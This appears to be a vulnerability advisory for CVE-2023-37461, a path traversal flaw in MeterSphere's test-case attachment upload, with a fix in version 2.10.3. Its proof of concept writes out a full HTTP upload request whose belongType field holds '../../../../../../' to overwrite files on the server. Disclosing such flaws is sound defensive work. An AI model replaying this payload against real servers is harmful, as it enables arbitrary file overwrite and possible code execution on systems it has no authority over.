Headline
CVE-2023-37461: Path traversal vulnerability in MeterSphere
MeterSphere is an open-source testing framework. Files uploaded to MeterSphere may define a belongType value with a relative path such as ../../../../, which may cause MeterSphere to attempt to overwrite an existing file in the defined location or to create a new file. Attackers are limited to overwriting files that the MeterSphere process has access to. This issue has been addressed in version 2.10.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Summary
MeterSphere validates only the uploaded file name and neglects to validate the belongType (file category) value that is joined into the storage path, which results in path traversal.
POC
POC: https://1drv.ms/v/s!Avwg5C1eKVA4gl3LF2hgRyVNrSqk?e=DHbHKF
1. Locate the "upload attachment" button in a test case.
2. Upload an attachment.
3. Intercept the request:
POST /track/attachment/testcase/upload HTTP/1.1
Host: 192.168.213.128:8081
Content-Length: 381
Accept-Language: zh-CN
WORKSPACE: ed18cee8-2004-4bf1-b112-0070bc03b270
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAv1vklOIsjcjAyZ7
Accept: application/json, text/plain, */*
CSRF-TOKEN: PpGjvIYb9h+d3ui4XudsF0lKJ9oUMhPVBGIkOzibaLIfhzPrKVb0YQLLHByaPGP8pZeHZ1VwtciGzO528axH8g==
X-AUTH-TOKEN: a84e0cf1-05a7-4627-8129-0bc264dc694d
PROJECT: a815f3f2-57be-47f4-8351-56a5c643c0de
Origin: http://192.168.213.128:8081
Referer: http://192.168.213.128:8081/
Accept-Encoding: gzip, deflate
Cookie: __stripe_mid=f2258077-6e3a-4225-8013-a67c38c075f2242a35; step_dashboard=true; step_client_index=true; privacy-options=6/12/2023|technical|statistical|external
Connection: close

------WebKitFormBoundaryAv1vklOIsjcjAyZ7
Content-Disposition: form-data; name="file"; filename="tmp2hyh.txt"
Content-Type: text/plain

tmp2
------WebKitFormBoundaryAv1vklOIsjcjAyZ7
Content-Disposition: form-data; name="request"; filename="blob"
Content-Type: application/json

{"belongId":"","belongType":"../../../../../../"}
------WebKitFormBoundaryAv1vklOIsjcjAyZ7--
4. We found that changing belongType to ../../../../../../ is enough to achieve path traversal.
5. We looked at the code: uploadAttachment checks whether belongType equals ISSUE or TEST_CASE. If it is neither, belongType is used directly in saveAttachment as part of the file path, which causes the path traversal.
Impact
Arbitrary file overwrite (limited to files writable by the MeterSphere process), which can even lead to arbitrary code execution.